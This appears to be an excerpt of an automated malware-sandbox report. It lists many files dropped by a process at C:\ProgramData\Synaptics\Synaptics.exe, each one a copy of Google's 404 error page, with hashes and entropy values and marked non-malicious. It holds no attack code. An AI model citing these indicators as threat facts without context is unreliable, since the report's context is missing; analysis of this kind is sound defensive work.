                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GSfinMdhigSOAxhp-ts1Bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.25449567816051
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0sOSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                                              MD5:9FFB9F61194FB0364D4748E944307C09
                                                                                                              SHA1:89E1D627AF3700CD9437645C5370F67AE5F8EFD8
                                                                                                              SHA-256:7ECC93930E48E62B25E8D7F8B6BC7679CF844882DE68BA5E1C4AB42D291BD268
                                                                                                              SHA-512:BFE8FB4F224A04D474825F0746DA994475AED7FBC61C5444B6A7D01AA6FA69997F582DE0A4FFF767C5A87BBBCAD81025AC8793DF8F7ABF009242B1FC7085DBF3
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wAMLqXY49F5XlagtohHobg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2624448658429115
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0qDwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tw+pAZewRDK4mW
                                                                                                              MD5:DF009ADB081655A9499F26AB041C781E
                                                                                                              SHA1:256571484A347FEB7BD0B129527286FE50827BE3
                                                                                                              SHA-256:1E0D534C535E1437E6D307363DC6DFA525EED9D31858B13A1CA7C46EBA7AD5C9
                                                                                                              SHA-512:1F7948E35DF0677A1C13B7A8C575EF5628A0916D26A81C50B7ED3AE027CFDB714C5364731BE48B5C26B4375C4EF377B66B3FA09634EB609EC23881FE32619997
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HpKFQx6sjLkz0aBxNpzemQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.272830419498396
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                                                              MD5:DB1B4AD6AEA4EC983DAE26FBFCBA0FBF
                                                                                                              SHA1:063F97D860F23952CFA2E73247E35BD1636C8D90
                                                                                                              SHA-256:7714212FAEE62E330D29FE099B1175529E0DAD298251B501FA4379DD39CE001D
                                                                                                              SHA-512:DD033D8CDA3A15F5E8A7C20DBFB56722C1425827CCF1D2B7E41C92B33A9EF13EFAAA73E9FAA6C5070062FF50E23C19DF2BE73E640E6949723652BD370F11790F
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ThPjd_xZOP_ZQTLnKGEu_A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.271292101065796
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0xkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8k+pAZewRDK4mW
                                                                                                              MD5:D55CEA679256E6F6B47D032C9F398106
                                                                                                              SHA1:DF6D6B46406A3B431BBC94A15251C296F03F98F7
                                                                                                              SHA-256:6E6F974179F53CD562152EB3A86AFA1856923E0C10533DE181819DB13D12B4C0
                                                                                                              SHA-512:D22E4F5F8FBA1F2C753EEAB9727463E014792DE0C99F3EE4F5E1093AB4E4E6D4F782A6AE877567EC663D5D1704B4538849BF58F3570D55D68CF1CD122F466401
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PuUwj7PIGVGy9aebHiIIJA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265481053401798
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                              MD5:7F38413A244B97540D79993340451342
                                                                                                              SHA1:E9EA1CF36343B9FD9FA5FA68B0CC1FAFBEAED428
                                                                                                              SHA-256:C08B42C19F0CCCE2B6F01D472CA30E02974BE69001BDF54C6C6898C2D7A726C4
                                                                                                              SHA-512:0E61C93372B62430E8E39C3CBC9E385B6DDACE93B5F5F7DCF73EEBDF531060D6F0341C04A0B3E2FB53A39421E205317FCEAACBCB63B4EE9EA73F4E728ADBDB9A
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0med3ZSxI8_N3uOW1FazOA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.263725722603262
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                              MD5:DD29E80249872C32AA36D9D8E5E443F5
                                                                                                              SHA1:4A31C1C07A36E824B09503C8DE08212EAB98160C
                                                                                                              SHA-256:235C154B3C5213FBADB710CA7B357F881ADB8A6997DC87B49C738C23CCC2FABF
                                                                                                              SHA-512:E09A34286E9B26B368F7148AE87AA6709AFFAEDEF1CCC01294214CC184792E862AE80C7D1363CEC838A2F4669379E009E42C7BB8150A0FDEDFDA897634B5F94E
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KbDoh8S19JW7WcMl1NmvoQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.280145512657072
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0ESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                                              MD5:4F06B31B80AEFD2F767DFC57053DCB04
                                                                                                              SHA1:D6804C2FA2A548B730CC6C831AFAAB11CA6349D4
                                                                                                              SHA-256:25112F4D8E91919C4B0E516FE30CF6104F3D9143C6B83F3EE01267F3D64C2232
                                                                                                              SHA-512:886CA32D3104361E5E40403250E7759695CA163AF937CBEAC38E7092A8C415630E1DEF63CD0F750973EDED821C3890608508797FEE1F1649E5116FF2FA192DFA
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kF8Am4QqHCOHLV7pZfU9ZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.260719727527338
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                              MD5:BE6545207B82DB6A855E93ADADC9D6B0
                                                                                                              SHA1:5728EE323938C3E3F1B083850B2821543466B0B4
                                                                                                              SHA-256:25F64377AA951E99EEFEC231734BE16FB509F9F45F37B4BF18A6565B62DBA7D8
                                                                                                              SHA-512:D4082D3425B0F8DE544EBD2573B95E3CBF3E6FED923B61A8A7AE506253851CED71DAF640474962018B3292E1F56D4D032984E21656A84302A0C614AF194421BF
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="g7intrOLWv2ZHClJ1SSkCg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.254791781376585
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0AJdzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+xdz+pAZewRDK4mW
                                                                                                              MD5:43052FD34DAD7C6060D4F2A7BE70B821
                                                                                                              SHA1:A247F6CF5EDEE87D4B6E5C16E0F20C18B9A61760
                                                                                                              SHA-256:B3E13DBB0A92C226CF632E65F9665FAAF436484077F1E7E9DBEBACDEE5BDB429
                                                                                                              SHA-512:89D49E6B9C8A85F18BE7CC84C70EE90A9DF74E47298B3FBED5D453C55C04CE391E8BCAE902FEE92D1FA0272E8BD8C31694DC2ACB9CEEEDAF5BC24BE58198A079
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="28lW--gN-zO7Nhjq-Th8_w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.26587818630776
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0IJ7WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                              MD5:609CCC2463B16220ACA47A0759AC7B45
                                                                                                              SHA1:381DE6923A0F45083C138D20C922E7E85C0B9A88
                                                                                                              SHA-256:3C98B3831A76FD45170EE240B6AED9E1B5511A1AACAD50A34E10641C707F8A0C
                                                                                                              SHA-512:3A9BE9A6DD8EF8637DC297E1D10665D0B2ECE24A7E38994988C1923B6E421368E03C5D9ADA3F6C05BBAAE549AB41093EC1359DF389CF8A76BCBA6AA3FB6F93B6
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SGspGgl3_Nm7jUQWdK9ArA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.273804693508221
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+00CPSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+MP+pAZewRDK4mW
                                                                                                              MD5:55F5DDA8EB1A4E8776131BA11C728F36
                                                                                                              SHA1:03CDFFF4D7D57F50B17BED47A190E85F83BA1E03
                                                                                                              SHA-256:8234062C5B3619D3F8B36EAFBAD301F432CE0265DCDF9A753541879B0D266F2D
                                                                                                              SHA-512:0AD30B6917D921E01B63086D1CA0739102CAE0610239A7F88290455031EDAB0A717602E77D3A2C79F9590DB438505B5A0D05DF10F435CF1C976554917EB1A738
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zCLyQqHkP8IfkEHOv0sHOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.269919508568457
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0HDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                              MD5:73E56FAB9CFA741674E012724B62134F
                                                                                                              SHA1:87FDC2A50108BD89196C377EF9881ED1686F10AB
                                                                                                              SHA-256:1403FD8582BFEBC1513CBFF9A0394B0C3EA737749D345F4522575ECAAEE6F3FE
                                                                                                              SHA-512:D7EA13189B32C7F892CC226A685F73311EB7009AE6D1D237488D981FBCAB9CCCC75665E722892CCC138ADC36B81DF44A97F43B4B930BBE4BA0137299491E95CD
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uCLf2IJcDuPZysFH2z7klQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2607128063985895
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+03SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                              MD5:CCA58DCBC9701B42C18CB0E8B567457B
                                                                                                              SHA1:3A0D16975858ED23FBF529AB6753D04D3EB38FF9
                                                                                                              SHA-256:08184C924AF5C92EA2F5F2C71E9475EBBF7557EE11C8EFB6D4819D1A1AACD8A8
                                                                                                              SHA-512:D487719025959A57FFEFC66CF4D9925C0F4D04905C769F975086E7A0C055D8494CC0C36EFCC18B2E23A4CDC4C18BCD8B7CC563E250EFC3EA1E6979F53EA10490
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7B6_OjQleBZabOUuXac1iw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.26284603286197
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0oIulSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                              MD5:DE976B61EE3FA74196114A0D018BB856
                                                                                                              SHA1:C0A99CC4DB125D294F692F0BD1E68D7D836231D0
                                                                                                              SHA-256:2E1219566192950FA325EF4765CF410D9251418FD40E4F89B466443EAC7D01C0
                                                                                                              SHA-512:5A76D3FFAB78427A525CA211208D8F58C1B2555363B99ED1CA8892193DC55A050798E31618418AD1D55B7E71E913CA5008E268AE1F60B1F6E9DA3E9446669B91
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iD2FQ21e7kcJQD9wUI74uA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.263913398452283
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0v5SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s5+pAZewRDK4mW
                                                                                                              MD5:B74D2D479070BB696EF34365BF7E0359
                                                                                                              SHA1:DEAEAACFA09F715CF693FA30C3C83B430480B7D3
                                                                                                              SHA-256:95DBA7C9FFBB83A4AD17BC25001AAB133021C12CF47C2053D62A9498D7F595F1
                                                                                                              SHA-512:3446F783796D9EA92936980C97F250861F9B740D534A9E23886013C5A38BC2270D38F5096863A34F464F6C38C6921CF350932F65442734EBF06D87564199EE88
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QvDmtX0MP6smc10VOtHpgA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.255754164092381
